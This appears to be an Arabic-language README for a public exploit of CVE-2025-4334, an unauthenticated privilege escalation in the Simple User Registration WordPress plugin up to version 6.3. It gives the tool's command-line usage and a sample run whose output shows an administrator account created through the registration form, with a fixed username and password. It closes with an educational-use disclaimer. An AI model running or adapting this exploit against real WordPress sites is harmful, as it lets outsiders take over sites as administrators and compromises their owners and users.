
Simple User Registration <= 6.3 - تصعيد امتيازات بدون مصادقة
إضافة Simple User Registration لووردبريس عرضة لـتصعيد الامتيازات في جميع الإصدارات حتى 6.3 وما يشملها.
ويرجع ذلك إلى قيود غير كافية على قيم user meta التي يمكن توفيرها أثناء التسجيل.
وهذا يتيح لـالمهاجمين غير المصادَقين التسجيل كـمسؤول (administrator).
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:Hيقوم السكربت بأتمتة تصعيد الامتيازات عبر إرسال نموذج باستخدام nonce ومعرّف النموذج (form ID) وreferer المستخرجة.
python CVE-2025-4334.py -h
usage: CVE-2025-4334.py [-h] -u URL --form FORM
Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation - by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Base WordPress URL (e.g. http://localhost/wordpress/)
--form FORM Full URL of the page that contains the registration form
-u → تثبيت ووردبريس الأساسي (مثال: http://localhost/wordpress/)--form → الرابط الكامل لنموذج التسجيل المعرض للثغرة (مثال: http://localhost/wpr/default-registration/)python CVE-2025-4334.py -u http://localhost/wordpress/ --form http://localhost/wpr/default-registration/
[i] Extracted Nonce : ffcf0140a8
[i] Extracted Form ID : 76
[i] Referer Path : /wpr/default-registration/
[i] HTTP Response Code : 200
[i] Server Response : {"user_id":13,"status":"success","signup":"signup","message":"Registration Done !\r\nUser Register Email not sent, please contact admin","redirect_url_signup":null}
[+] Exploitation Successful
[+] Username : Nxploitedadmin
[+] First Name : Nxploitedadmin
[+] Last Name : Nxploitedadmin
[+] Email : [email protected]
[+] Password : nxp1234
[+] Role : administrator
Exploit By : Khaled_alenazi (Nxploited)
هذا السكربت مُقدَّم لأغراض تعليمية وبحثية فقط.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.
من إعداد: Khaled_alenazi (Nxploited)